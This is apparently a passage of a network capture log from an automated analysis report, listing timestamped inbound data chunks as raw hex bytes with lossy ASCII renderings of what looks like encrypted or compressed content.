                                                                                2022-05-27 11:26:33 UTC188INData Raw: 23 24 c2 cd 9a 61 7c 1a de 47 f0 85 28 af 21 dc 43 47 c0 1f 1a cb f0 99 21 68 57 f1 78 49 01 a2 9c e2 71 9e a8 2d 88 f8 6a 98 af f9 c5 cc ec 32 87 dc 7c a3 8c 2b 6a de 7a c8 73 94 3a a1 d2 4e 22 14 dc 1b a1 43 ff ce fd 87 a4 f7 40 93 72 fd df 72 86 e5 ee 34 b0 4b 26 e1 c0 45 19 a5 01 e4 9c cf e0 16 55 f8 20 4e 50 80 10 19 2a a8 e9 89 09 8c 5c 03 9a 92 ef cd cd 23 e9 14 8f 16 e6 60 3e a7 52 8e 30 f4 8f 20 1e 4d 62 a8 18 d2 fe 8f ea b6 28 f6 62 6b 24 42 65 d5 60 b4 1f 36 d8 42 8f d8 d3 7a 10 c2 57 f3 0b 1a 70 a8 e2 e9 ae 3c 75 d6 06 4e 9c 2f 25 83 0d 09 2a 1f fd b3 1c 56 fe 16 9a 2f 25 0e 3f 03 c7 7d fa fe fd 32 71 ea 94 a2 73 d8 eb e9 6c 26 7e 2a ee 07 24 eb d9 4c bb 0c c5 90 59 ec d6 a0 2b 67 6d 51 ac cd 7c 23 0c fa 34 aa e5 f1 61 dc 89 e1 e3 f7 84 76 9f
                                                                                Data Ascii: #$a|G(!CG!hWxIq-j2|+jzs:N"C@rr4K&EU NP*\#`>R0 Mb(bk$Be`6BzWp<uN/%*V/%?}2qsl&~*$LY+gmQ|#4av
                                                                                2022-05-27 11:26:33 UTC189INData Raw: 1f 49 72 d3 1d ef 6d a5 00 95 6b de 99 6a bc 88 e5 d7 5f 45 41 4e 94 7f 9f 98 3a 4b ca d5 ed 76 5e c0 fd 55 be d8 25 ee 0a fd df da 0c 25 17 7a 16 1d 09 7b d3 ce 32 c5 72 b7 5c 2f 1e bf c7 63 9d 51 d1 b5 6c 1d 87 a6 4f 16 cd d4 fe b0 82 35 32 fd 7a de 38 5a 86 3e 64 f8 28 93 38 7b 72 14 29 cf 16 c0 0b f4 32 f5 23 65 9b e4 3d 2c 03 c4 21 b1 56 b1 4f 14 4d 5d 84 45 c9 10 f0 23 69 a5 2c c0 99 6e bb bf 1b e5 48 6b 82 7b 3f d4 e8 b7 f4 c2 4d 43 0d 9b 6c e1 1e 61 56 6a 06 4c 1f f0 b4 e4 31 33 f9 5c 53 d7 3a 25 c7 3d cf a8 ab 92 2e 65 40 84 09 6e c0 08 c3 19 8e d8 d8 d8 16 e2 9c 60 f8 67 ad b4 5a ad b5 66 37 9e e6 32 23 6e 5f 18 c9 ec d8 67 9e 78 12 04 08 33 42 4c 63 bd cd a8 5b 37 28 85 ff c0 1f 50 67 f4 4d 7d 7f 7e ab 15 4f 2b 53 34 91 dc 8f c3 9e ad 60 28 f3
                                                                                Data Ascii: Irmkj_EAN:Kv^U%%z{2r\/cQlO52z8Z>d(8{r)2#e=,!VOM]E#i,nHk{?MClaVjL13\S:%=.e@n`gZf72#n_gx3BLc[7(PgM}~O+S4`(
                                                                                2022-05-27 11:26:33 UTC190INData Raw: 92 85 b3 d1 28 92 fe ac bb 58 f6 8d e8 05 43 db 9b 1f b0 59 a8 dc ad 98 cc 7e 1e d6 4d 0c 2f 0b 8e 7d 5c 61 2f 50 70 59 2f 90 48 48 2e 23 14 2e ca 94 8b 9e 55 35 d5 85 10 cb 00 9c 90 5d 5e d7 fd e2 28 7c f7 68 8a b0 64 36 35 80 59 f7 79 df 2a b2 95 69 ff 4c 2c 4a 05 80 bb 1c 26 9e a2 8e d5 9b 4e de 16 bc a8 e1 0b 41 9e cf 7c 50 0d 74 ca 8e c5 7d e9 5c 1c 3a 97 b6 8e ac 87 80 15 61 24 92 88 26 2f 80 e9 94 b1 01 80 54 68 56 ee f6 e0 18 9a d8 fd 19 1c 82 e1 13 44 39 4c a4 ef c3 3e 48 4e 45 49 98 66 f2 96 bf 27 45 36 45 1d 9f 35 a1 ab 38 24 d1 78 f5 05 c3 b0 35 4c ad c1 74 bb 22 f9 fb cd a6 74 8f 1b a6 d4 15 ce d1 d1 7d b8 dd 5c 62 47 5a 1f 4d 20 5b 7d 5e 24 eb e6 2b 7c 43 e6 c9 18 77 2d c0 bc 4b e3 12 b5 3f 76 c7 c1 ab 36 84 66 6e 06 a3 33 19 fe 04 0f 2a 5d
                                                                                Data Ascii: (XCY~M/}\a/PpY/HH.#.U5]^(|hd65Yy*iL,J&NA|Pt}\:a$&/ThVD9L>HNEIf'E6E58$x5Lt"t}\bGZM [}^$+|Cw-K?v6fn3*]
                                                                                2022-05-27 11:26:33 UTC191INData Raw: 31 bd 1d ff cc 71 86 4b aa 43 1a 96 2e 7d a9 ff e8 7b 53 1b 9e 78 36 54 95 d9 83 7e e1 f2 16 c0 99 6a c2 fa c4 a7 ad e3 6e dd 82 17 b8 8c 10 3f 9d 1c f2 7c ba 60 88 ab 64 4e 48 b6 09 fe 6a b2 e0 fd ed ca a6 04 db 7d 50 be 71 cf 6e ee 70 de bd 6e 97 d0 78 79 8c 6c 05 9d 85 8e 17 31 f4 0d 2b 31 e4 76 78 2a cf 88 25 6e e1 28 5c de 5e 9b 26 cd ca 8c c5 d0 e2 87 0e 5e 8e 03 ce 5e c4 eb 0e 6b 41 07 08 78 86 9d cf b8 a3 45 14 05 a1 52 03 07 9f 02 ed 4c 23 b4 8d e9 4e a4 f4 57 ce 27 4c 0f 72 17 94 a4 d3 ab c1 12 06 46 49 9a 1c 41 28 4c a3 2c 8a 99 b7 7a 0a f9 2c ff 4c 41 1b 38 ee a2 ab 98 ab f5 16 1b a4 fb b7 7b 32 90 1a 0b cd 1a e7 84 ab 6e 42 d1 4e d1 66 88 3c 50 73 bc 46 64 12 67 21 c5 ac 3e 39 06 1e 5d 3f 8d 3a 6b 09 e0 0b 8d 6f 8e 31 f7 56 63 fc ca 63 7f ed
                                                                                Data Ascii: 1qKC.}{Sx6T~jn?|`dNHj}Pqnpnxyl1+1vx*%n(\^&^^kAxERL#NW'LrFIA(L,z,LA8{2nBNf<PsFdg!>9]?:ko1Vcc
                                                                                2022-05-27 11:26:33 UTC193INData Raw: 76 78 1e 17 7d e0 e5 c4 71 bf 2d 08 a5 0d ca c6 ff d2 db 72 35 87 00 a1 b6 25 55 ba f8 fd b3 43 2f 73 5b 91 97 6d 4d 70 81 73 fa 70 1b bf ad 50 2f 17 3d 16 44 7a d3 a3 f8 de 71 bf d2 18 3e ce 0c 21 10 81 b3 fe b1 e6 8c 66 f9 13 b9 7e 6e e8 9c 2c 0a 4c f5 54 1e 73 2f 49 f4 59 ad 6e f4 61 c5 41 d5 d0 8b 5a 06 67 93 64 17 35 de 23 7b 2d 60 c3 c2 ab 74 f0 67 0d 92 48 08 d0 29 d2 d3 7f b8 0a 17 cf 00 50 b8 8c e8 92 39 12 14 40 b9 04 ee 52 ae 35 1e 6a 6a 1e c3 c7 b9 78 54 8a 6c 1f dd 5f c2 80 5a cf 9d cf 81 70 a4 32 ea 6c 2d a6 04 b6 f3 c9 b2 b4 fe 59 e8 f0 99 f9 17 c8 83 04 86 dd ed 57 d3 87 1b 47 01 19 c2 b6 bd b9 09 fb 66 7e 19 7c 5e 27 42 03 a3 a9 60 05 55 5c d1 9b d8 6e 75 26 91 28 33 1f 64 cf 46 20 47 27 72 f9 c9 eb f1 f5 c9 05 28 95 ed 17 e0 6e 4b a9 9f
                                                                                Data Ascii: vx}q-r5%UC/s[mMpspP/=Dzq>!f~n,LTs/IYnaAZgd5#{-`tgH)P9@R5jjxTl_Zp2l-YWGf~|^'B`U\nu&(3dF G'r(nK
                                                                                2022-05-27 11:26:33 UTC193INData Raw: 02 d2 c2 06 08 55 dc b9 3e 34 6b ed 93 2e f5 39 d4 0b 50 c7 c5 87 5b bc 44 1c 02 e0 63 0f cf 50 03 3a 29 37 a4 99 70 b3 1d 2f 00 2f 15 64 42 1f 18 65 e5 fb c8 10 96 3c 3f 9d 0e da c6 e1 d2 93 50 3a 93 18 b1 c4 12 20 95 fc e4 b2 4f 18 6b 5f 9d b0 62 61 75 9e 73 fa 6c 1f be ad 7e 3e 18 10 14 5e 5d d0 aa 94 f8 60 ae da 03 35 c4 0c 3c 11 ed 9e 8a 82 f3 af 57 e2 31 b9 4b 6c e8 9f 17 0e 22 d6 5d 0f 21 22 5b ea 52 af 78 91 33 e3 4e ce c2 80 3d 2e 6b e0 50 17 31 d5 4f 40 3e 7d d5 ca b5 62 95 23 3a 9b 5b 19 c7 1c de bf 59 ca 2c 19 d5 16 3f 99 9c 84 81 35 05 2a 7e ac 29 e5 73 a4 36 0a 72 6a 1e d4 d0 a2 50 54 80 7d 3d d3 49 d3 bf 4b ae 9a cf f5 6a 8e 3a f3 66 5f 83 13 ad db fc ba ba f7 72 da e9 9d 8d 01 ad b3 3e ac d1 f5 57 9d 81 13 56 5e 1d c6 ac b8 aa 0e eb 6c 13
                                                                                Data Ascii: U>4k.9P[DcP:)7p//dBe<?P: Ok_bausl~>^]`5<W1Kl"]!"[Rx3N=.kP1O@>}b#:[Y,?5*~)s6rjPT}=IKj:f_r>WV^l
                                                                                2022-05-27 11:26:33 UTC195INData Raw: 3e 23 53 e9 72 71 05 15 0f c8 cb 76 0e 69 3d 5f 4c 8a 6f 5f 39 f7 79 80 62 e9 54 d1 25 66 fe ba 61 58 8c 24 99 0a 82 a2 93 d1 3b a3 9d c2 8a 44 c0 a5 f6 14 36 8c ef 2c 86 4c be fc ad 8b fd 0c 71 f5 4c 29 2e 1e db 18 28 5b 0b 7f 54 0a 20 b4 0e 2d 6a 4a 05 2a ca ae 8e b8 7c 6b bc d5 38 f7 10 9b 95 56 07 d7 fc cc 45 38 a5 2f aa a6 27 74 6f c3 7c c1 69 85 54 f2 de 43 a5 06 14 48 26 cc c5 5e 6c b2 ff d1 ed 8b 7a fd 5c 8b 9b 88 21 67 9e d9 44 23 3f 50 a7 e7 c0 0f c0 6a 75 35 b1 b6 b8 82 d2 af 3b 0f 27 d3 dc 0e 06 9b ca 9c d5 13 89 45 71 72 f1 f4 ae 3b 9f bd ff 71 7a 87 89 74 40 51 0b 87 f3 95 16 4c 3b 60 44 d1 69 fc f9 af 22 24 0f 4d 06 92 1c a1 8d 12 24 f7 52 f5 27 e9 b0 17 66 ad e0 53 cf 3a eb 9a f6 97 03 81 2b c2 fe 36 bd da 93 3e b3 f2 2c 72 71 3f 31 6e 53
                                                                                Data Ascii: >#Srqvi=_Lo_9ybT%faX$;D6,LqL).([T -jJ*|k8VE8/'to|iTCH&^lz\!gD#?Pju5;'Eqr;qzt@QL;`Di"$M$R'fS:+6>,rq?1nS
                                                                                2022-05-27 11:26:33 UTC196INData Raw: 57 4d f1 a1 fc 6a 56 22 fd 3e 18 0a 56 e3 32 02 4f 53 62 f1 d0 e2 cb d3 c1 14 61 86 ed 0e bf 44 41 b9 b5 dc 0b 1f 54 8d 3d 8c dc 4d eb 2e bc 33 19 bd 4f 6e 99 91 cd 72 2a 2b b0 1d 1f 0e f3 f1 d9 19 ca a8 45 fe ae 07 c6 d4 b6 ac 94 a2 61 e0 ed 01 8b f8 1d 08 9d 32 c9 0f b5 7b e4 ba 6a 50 54 a7 3e cc 6a bc d5 8f c7 c6 a6 12 db 13 71 b0 1c 89 46 ad 45 c6 cd 52 99 84 6b 79 e2 7d 02 f2 94 82 17 10 fb 78 23 50 a6 7e 19 69 c6 e9 61 67 84 19 6d 9a 79 81 47 8a d7 e9 f9 e1 a6 b2 15 7d e1 3c d0 54 d1 e0 6d 56 57 2f 25 6d 86 90 aa ad bf 4e 17 01 ac 26 25 08 eb 00 83 1c 35 b5 fd c0 59 be 8d 74 ca 27 72 5c 53 07 f1 82 df ab c6 1f 76 7a 6d e8 35 4e 7b 68 b3 49 a7 95 b7 7c 0d 8d 11 c8 3f 47 0b 6c e5 ab ce 93 c9 86 15 0d fb c9 a6 1e 2d b7 16 0f da 18 8e aa c2 5f 55 b4 63
                                                                                Data Ascii: WMjV">V2OSbaDAT=M.3Onr*+Ea2{jPT>jqFERky}x#P~iagmyG}<TmVW/%mN&%5Yt'r\Svzm5N{hI|?Gl-_Uc
                                                                                2022-05-27 11:26:33 UTC197INData Raw: bd 34 46 54 cd 91 2d c9 51 d2 16 35 9d e3 9a 59 cc 67 1e 67 a3 43 7b f9 74 6c 2c 2d 45 97 8a 04 81 1f 4a 48 38 70 52 74 22 1b 72 f4 89 c3 01 f8 2b 0c e8 06 de b3 f6 c7 93 75 2b e3 0b b4 b6 30 52 bb f9 e4 de 64 0a 0a 68 85 df 48 52 14 a8 67 fa 64 0f d3 8f 40 5c 3a 04 77 4b 6f bf a4 89 9d 60 ab b3 08 2a 86 08 3e 74 8b a7 fe 91 f2 f8 70 f2 63 9f 4a 1c c3 83 64 2e 50 91 7e 09 73 00 5a 9a 75 b3 0b 93 56 d4 7d f8 d4 84 4f 6a 41 ff 45 19 30 b0 1b 7b 0f 6c e4 d9 c7 55 99 51 0d 9d 59 13 c7 16 e8 da 6a d9 3b 19 d5 1c 4d 97 81 89 87 5c 04 39 0d bb 1f 80 7b b3 51 28 63 7d 1e c0 c1 a4 7e 50 94 4d 37 d3 5f d2 9e 3f 8d 87 c4 94 5d 93 01 e2 68 49 a4 13 c2 ff c7 9a e9 d8 65 f0 ed 88 96 37 c8 85 2d a9 d7 e4 62 ef 89 00 4b 65 3b d5 c2 a2 9c 52 dc 7b 6a 2f 61 5d 11 69 10 b8
                                                                                Data Ascii: 4FT-Q5YggC{tl,-EJH8pRt"r+u+0RdhHRgd@\:wKo`*>tpcJd.P~sZuV}OjAE0{lUQYj;M\9{Q(c}~PM7_?]hIe7-bKe;R{j/a]i
                                                                                2022-05-27 11:26:33 UTC198INData Raw: 02 15 a6 e1 1f 39 74 10 4d 50 89 2d 45 3c ea 78 9c 6d e2 16 f5 25 6c fc e4 49 65 be 35 8a 2f 9f b3 9f cc 5c e4 ad d8 a6 59 d0 b0 e7 1f 11 88 e8 4d b2 5d b8 ca 80 84 94 24 7a cc 4d 21 24 0c bf 06 3d 5d 01 79 56 79 67 96 1f 09 5c 4a 01 2e dd bf b1 b8 7a 68 a6 b9 3a c1 10 b6 ac 4a 0f a7 da d1 5c 21 a1 2e cf b0 2b 76 67 c3 7f 84 53 9c 6e f4 c3 44 a6 04 7a 7b 15 d9 e4 43 7f b9 fd d3 9e d8 48 fa 5b b9 80 8d 2a 73 9e cf 53 25 26 65 b8 a6 e7 18 d2 6e 51 34 b2 c3 80 88 f4 e3 1a 14 2d b1 ed 13 19 80 dd 97 b0 07 ec 76 4b 4b d1 e6 cc 32 92 c4 f2 78 17 a6 92 74 57 5c 6a a5 da f9 3d 68 52 46 49 a2 08 d3 9c b9 1a 56 2d 4f 17 82 07 c4 9a 7a 63 f7 4e bd 2e f2 c4 31 6a c9 f5 53 c8 16 de 88 85 a2 1d 82 3c e7 c2 23 bc db f1 08 a8 fa 2f 07 56 3f 0d 4e 54 48 4d 37 0e d3 d3 0d
                                                                                Data Ascii: 9tMP-E<xm%lIe5/\YM]$zM!$=]yVyg\J.zh:J\!.+vgSnDz{CH[*sS%&enQ4-vKK2xtW\j=hRFIV-OzcN.1jS<#/V?NTHM7
                                                                                2022-05-27 11:26:33 UTC200INData Raw: 10 ae 38 1f 14 6c c9 32 67 61 3c 5a fe c0 ed cb 94 d7 05 5c ad c9 0f d3 4c 53 8c 9f ee 0d 21 54 ba 2d 8d cd 4b f2 2e a6 2d 0c bd 41 6e 95 9c de 21 37 2c c4 34 13 7a f0 db bc 0a a7 e4 77 f3 a6 23 cd c4 a1 bd b0 86 79 87 d1 0a 91 f8 10 08 b3 34 cd 08 dd 76 e9 a9 60 71 58 a7 56 d2 0f 84 de bc cd c8 c3 30 ce 2e 7a bc 1a ec 7b ee 51 cb bd 41 82 d0 7e 7d f8 51 2c f8 8f 88 7f 21 95 6a 2b 24 bb 5c 7c 44 cf 81 51 09 f7 39 77 c5 73 8a 29 aa d1 9d b1 e0 d6 b9 3f 47 fe 3f d5 52 d9 fa 6d 4c 54 0f 25 6d f2 ab ae 81 a5 6c 11 12 87 5e 2e 12 eb 35 8c 69 3d af be e0 53 a3 e8 45 ce 26 41 7b 30 23 f5 92 dd df ca 00 63 6d 7d fb 2f 4f 5c 0b a6 49 b6 a4 f3 7e 0e 98 3b f1 38 22 30 79 f9 b9 c5 9e 9b 90 03 0c c8 e8 d5 08 3a 97 26 31 cc 13 fc a7 cc 49 4f a5 0d e5 03 ae 1c 3c 5f ba
                                                                                Data Ascii: 8l2ga<Z\LS!T-K.-An!7,4zw#y4v`qXV0.z{QA~}Q,!j+$\|DQ9ws)?G?RmLT%ml^.5i=SE&A{0#cm}/O\I~;8"0y:&1IO<_
                                                                                2022-05-27 11:26:33 UTC201INData Raw: c3 28 b5 34 54 b7 d0 81 44 b8 50 0f 0b ab 56 02 bd 63 09 1d 02 02 a4 93 60 8b 0e 39 74 2d 02 5b 78 2f 76 60 e1 fd fe 36 8d 21 18 a5 03 dd c7 f6 c5 d8 76 22 e3 2f ab d8 03 41 bd e2 e7 95 43 02 0a 69 b7 ad 75 53 60 a4 7b 8a 4d 0c a7 83 54 25 72 37 34 58 67 cf b2 bc f8 70 ae c1 03 22 cd 08 36 74 bf b3 99 9f f0 8c 40 f9 28 b9 41 1c e1 88 64 0c 5b 91 6b 02 00 33 4d f7 13 92 6e 97 46 d2 4b d5 c8 cb 7e 18 7b e3 54 17 25 c2 2e 64 24 7d 85 ec a2 65 b5 5b 0d 9d 58 08 dc 01 dc fe 69 cb 2c 15 c3 1f 46 d4 8e 8d 81 03 27 2f 69 aa 08 f3 6c 87 30 06 6f 63 67 93 f8 a3 77 45 90 6f 3e cb 3b f6 82 46 cf ac c6 9a 4c 81 10 e8 79 54 c1 06 a7 d8 d0 8f b7 ef 76 e5 cd 94 80 17 c4 94 3a ac f9 e4 5f f2 94 0f 22 42 2c c2 a3 9b bd 23 f6 7b 76 3c 61 5d 30 75 62 a9 a9 14 1d 62 4d e2 97
                                                                                Data Ascii: (4TDPVc`9t-[x/v`6!v"/ACiuS`{MT%r74Xgp"6t@(Ad[k3MnFK~{T%.d$}e[Xi,F'/il0ocgwEo>;FLyTv:_"B,#{v<a]0ubbM
                                                                                2022-05-27 11:26:33 UTC202INData Raw: 7e 3f 31 e9 59 68 6b 8d 05 eb 0b 8e 56 95 58 14 1f 7f 00 1a ff d0 59 5e d6 d2 e8 3f fd ad ca a9 cf 35 a2 ca 9a 73 5d ed 9c 4a d7 29 4c 54 de e2 f9 68 1e 9f 27 40 41 7e b1 56 59 2c 42 13 3d 04 69 d4 7a 7d 09 a3 b2 4f 9e ca d0 c4 16 0d d4 b7 40 aa 63 e9 f8 36 6e d9 b1 ad 2e 48 c5 5c dd 75 96 0e 01 ae 15 d0 bd 2b 1a 88 a9 2a cb 73 94 de 46 98 97 37 1b d5 94 b6 ef d9 01 91 29 f8 eb f3 cf d5 96 8c 1d 51 4a 27 4a 10 99 7a a4 08 0e db 0b b7 e2 f8 95 63 89 60 52 52 80 73 cb fc b1 ea 55 95 ed 23 af 37 9f 9d a8 6c e5 3d 61 18 74 cb f4 66 85 e4 0a d3 1a 9d 58 04 3b 3d 3d 51 e9 95 ea cd 42 31 53 ac 93 f0 66 20 e1 7c 24 90 34 fb 5c 8f b5 50 0f ac 94 36 b8 45 bb f9 80 c4 74 f3 4a a6 ab 50 c8 a0 13 94 c9 8d dc da 04 48 f8 07 32 bd 37 4b 7d 26 46 69 6e 80 ad d8 db f5 30
                                                                                Data Ascii: ~?1YhkVXY^?5s]J)LTh'@A~VY,B=iz}O@c6n.H\u+*sF7)QJ'Jzc`RRsU#7l=atfX;==QB1Sf |$4\P6EtJPH27K}&Fin0
                                                                                2022-05-27 11:26:33 UTC204INData Raw: 41 47 20 52 26 12 ac 86 ba 94 a4 72 aa ff 84 63 ba 22 36 4f e3 92 70 f1 38 d6 4c f9 a8 2b 84 32 ef 41 7b cf 2d 14 ed fa a2 29 56 78 c5 76 6f 0b 96 9a cb 3e ad a9 16 82 90 12 eb c5 8a c5 f7 e1 0b 9f 87 74 e0 9e 35 6d 99 7a a8 6e 9d 3f 8f df 17 6e 35 d6 56 a0 6b e2 c1 ef a9 a1 a8 49 a8 08 08 d6 63 09 92 e7 3f b7 af a6 1f d8 1f 18 8d 1c e4 00 ee ea 17 54 9d 1f 7b 53 c4 10 01 2e a8 e8 3d 03 8c 5b 06 94 31 e1 49 df cc ef b1 8e b4 64 5b 31 86 54 b8 23 30 67 63 17 2c 6b 4b 1a e3 7c 0e f5 df 22 78 67 c6 24 4f 6e e3 60 ed 1c 53 dc fa 89 32 d2 85 1b a7 56 2a 0d 3e 67 e1 e2 91 a9 8b 78 0e 07 0b 9b 54 2b 2d 2b c1 3e 40 de b1 1b 69 f8 5f 1f 65 2d 7e 31 84 c8 b6 f8 cb ed 68 71 b6 1c 3c 69 2a e7 79 65 a7 7e 8a e6 aa 22 28 d5 05 b2 74 8c 5c 56 24 93 45 24 63 37 62 ab ac
                                                                                Data Ascii: AG R&rc"6Op8L+2A{-)Vxvo>t5mzn?n5VkIc?T{S.=[1Id[1T#0gc,kK|"xg$On`S2V*>gxT+-+>@i_e-~1hq<i*ye~"(t\V$E$c7b
                                                                                2022-05-27 11:26:33 UTC205INData Raw: 9c 30 cc 27 67 7a e5 3b 7d bd 06 6b 74 58 4d d8 da 04 d3 7d ca dd 49 62 64 11 51 71 11 8a 8b bd 6c e4 55 60 f5 60 a9 b3 91 b6 9d 02 db 22 6a e4 b4 75 32 a0 82 9c fe 24 79 18 5f e6 5f e1 2f 13 eb 0b ff 28 7c c1 48 dc 41 77 7d 70 0a 1c b5 cc e9 1f b2 d0 93 6f 5a 94 ed a2 65 6f 6f fc f3 83 fa 38 8a 69 db 3f 1f 85 f3 76 eb e7 99 18 79 71 55 5c 8a 20 c4 1c f3 34 b5 30 21 6c e4 2f 1e 00 9d 2e 6a 2e a2 3b 01 5d 84 64 aa d5 65 f7 36 79 7e cc 7d a7 1b be 9f 1b ba 5a 78 ac 73 3d d6 f9 fa 99 49 74 cb d0 d9 7f f4 17 c6 54 76 03 08 19 9a bd d2 3b 30 f0 16 5c b5 3c aa e9 2d 4f 3f b7 f0 28 e0 4e 82 01 28 c1 60 df a9 88 de d8 9a 0a 8c 94 f9 d9 65 ac e5 2f cf b3 86 2f 98 fb 73 30 81 8f ba c7 e8 c5 62 97 0d 14 5d 1c 3a 46 2c 63 c7 c6 6b 45 35 22 98 fb a7 9e e2 52 f8 45 78
                                                                                Data Ascii: 0'gz;}ktXM}IbdQqlU``"ju2$y__/(|HAw}poZeoo8i?vyqU\ 40!l/.j.;]de6y~}Zxs=ItTv;0\<-O?(N(`e//s0b]:F,ckE5"REx
                                                                                2022-05-27 11:26:33 UTC206INData Raw: 9e 0e e1 02 9c d5 99 54 17 1d 0f 16 69 fc d0 28 51 ea cc e6 b7 54 83 ca a4 f2 32 b2 46 53 5c 75 f7 8e 5f 55 e5 cd 9b cd e2 f3 55 10 80 2c 4d 4f 71 a3 59 dc c0 6a 1f 3b 02 69 d9 74 60 1b 2b 6e 45 a3 c8 c3 c9 06 1c 55 58 5c aa 6c ef e9 29 e0 36 be ad 2e 68 c5 4f 4f 1c 50 00 26 ac 09 41 d4 f6 14 86 ab 28 d9 e0 19 1f 4d a8 9e 3a 10 cb 93 a6 e3 c8 12 9a 3e f8 e5 e9 53 08 96 82 3f 58 43 28 d6 d4 98 60 a3 15 16 7b d2 be f1 e8 8f eb 45 e3 95 d6 88 63 42 fc ac f0 d5 77 ee 23 af 32 92 9d be 64 f2 b9 bb 1b 66 cb e6 74 07 25 19 40 96 9b 5b 24 38 34 3e 50 05 85 79 1d 44 36 0a 2c 26 f1 20 a1 b9 7a 0b 92 0b f5 6f 81 81 70 2e ad 81 31 b9 77 3a f6 8d e1 74 ee 4b 27 bb 52 e6 b2 81 fc d5 9c 74 07 0d 5f 51 0f 32 bc 8f 59 4c a2 a6 66 74 0f ab cd 5d 26 af 55 fb 4d b4 d1 09 71
                                                                                Data Ascii: Ti(QT2FS\u_UU,MOqYj;it`+nEUX\l)6.hOOP&A(M:>S?XC(`{EcBw#2dft%@[$84>PyD6,& zop.1w:tK'Rt_Q2YLft]&UMq
                                                                                2022-05-27 11:26:33 UTC207INData Raw: 8e b6 92 b1 72 a8 2f 89 71 3f cf 22 ca e8 8b e2 9b 39 db 64 ff b9 a8 6e 28 d3 42 7d de ae f2 fb f8 a8 34 41 d8 19 79 60 8e 79 94 d3 5e a7 bd 04 07 1e 6b b1 20 28 ce d7 e2 0c 92 90 f3 3f 8d 67 e5 71 7f af 7e c0 3f 80 fe 02 2d 2f 53 bf af 78 70 68 f8 ab ae b4 c0 56 6c 95 37 79 94 0a e6 2a ba b5 3b f3 c5 08 98 6d 0f 76 1d 0a e8 37 57 87 8d a7 5e f8 17 39 28 ba 69 cc 01 8c 54 16 8b bf 0e 46 df 39 05 b4 a7 a6 f7 fa d7 84 7b bc 24 a2 0e b0 1e 36 e3 a0 1d da fc d2 ed d5 2c 6c e3 d7 2d 67 62 ea 71 6e 09 4c de e0 89 34 da 8a 15 a7 4e 28 12 35 7d 9c ef b2 a1 84 78 03 23 2a 87 5f 2b 22 1b c0 2e dc fb a7 05 68 e7 4e 9b 6c 20 64 3d 82 ce a7 8e c9 9d 70 18 a4 a9 d5 4a 5f d1 79 72 b8 78 93 e3 b6 29 3d cd 05 ba 7b d0 42 4c 2b dd 4e 2a 6d 7a 7a ae a8 76 5b 03 63 3b 1f ee
                                                                                Data Ascii: r/q?"9dn(B}4Ay`y^k (?gq~?-/SxphVl7y*;mv7W^9(iTF9{$6,l-gbqnL4N(5}x#*_+".hNl d=pJ_yrx)={BL+N*mzzv[c;
                                                                                2022-05-27 11:26:33 UTC209INData Raw: b2 73 a8 16 ec b4 5c 4b c4 e8 84 1b 6e 58 81 40 7e 1e 13 58 6b 16 8a 9b 20 11 f6 5a 09 e0 70 2f bb 81 c2 9b 0e 55 eb 71 ca be 4c 27 cd 99 86 5e fb 7a 18 aa fc d1 02 36 06 6d cb fb 30 ff db d5 34 41 7c 7b 65 aa bf b1 d4 78 3c 0d c8 33 cd 49 07 65 41 69 e8 c4 8b eb 86 f0 2f 8e 6b c1 36 14 9a ff 79 68 3f 9f 3e 5b 72 55 a8 3b 33 c5 2b f4 2e ae 39 a6 bf f7 bc 62 10 12 28 76 4a ad 41 1a 5e 84 6c b9 47 f8 f8 31 1d e3 2e 72 bb 61 be 9f 1a aa ca 21 a7 53 3c c8 e7 e6 e9 59 66 4b 1f 59 65 b4 18 d9 44 79 86 d2 1f 81 34 de 15 2d ec 0d d2 6f 3a a5 6d 37 d3 f2 b8 74 4f f8 26 8f 07 23 cf 73 43 a4 9d ae ca 1a 77 9b e8 f4 f7 6a a3 e5 da c8 a6 f4 3a 95 e0 56 23 13 df 4a cc b8 df 7e 8a 1b 91 ba 17 3c 50 8d 6a c0 c2 6e 57 22 a8 58 ff a7 9f 3b 5a ef cd a0 7f 1b 2b 4e 75 a3 db
                                                                                Data Ascii: s\KnX@~Xk Zp/UqL'^z6m04A|{ex<3IeAi/k6yh?>[rU;3+.9b(vJA^lG1.ra!S<YfKYeDy4-o:m7tO&#sCwj:V#J~<PjnW"X;Z+Nu
                                                                                2022-05-27 11:26:33 UTC209INData Raw: d6 c6 a7 81 fd 01 9e 4e 86 0d 54 6b 8f 81 32 2d de cd a8 a9 66 6e 80 ad c7 53 29 23 81 df 49 ba 5f a9 4a 32 d5 93 fa b6 11 24 7c e6 e8 26 69 3d d9 6d 67 48 57 51 27 05 d4 ee 42 1c 54 6c 0c 13 44 f7 1b 8a 94 af 7f f6 5a 09 fd 73 2e 52 92 b9 9b 0e 55 f1 ed cc b5 7d 21 da a8 93 d5 33 69 8a f6 f5 cd 8d 2b 01 ff 96 27 23 6c 52 c0 3f 4e f2 d4 79 38 9e 1e d4 79 95 1e df a1 19 53 9b 63 64 73 fe c3 ec 76 5e f9 20 01 6b c9 2a 9c 5a f0 76 ea 2a 9f 25 75 7d 49 26 94 2f 40 03 e9 3d bd 2c af bf ed 20 64 1f 90 28 65 4c b8 45 13 4b 0a 8b a8 d5 64 f8 2d 60 fa 2d 7d bd 6c 94 b8 02 ad 5b f8 7c 72 2d 55 e1 e6 fb 49 74 cb d0 d9 7f 01 17 cf 5f 65 08 12 10 9b bb cb 15 2c f7 17 5a ba 33 a5 6d 37 dd 9b a2 fd 32 e9 5b 8f 3f 2a da 74 d0 2c 52 da ca 1a 1f 9c 8f 7c 24 65 bf 76 53 ce
                                                                                Data Ascii: NTk2-fnS)#I_J2$|&i=mgHWQ'BTlDZs.RU}!3i+'#lR?Ny8yScdsv^ k*Zv*%u}I&/@=, d(eLEKd-`-}l[|r-UIt_e,Z3m72[?*t,R|$evS
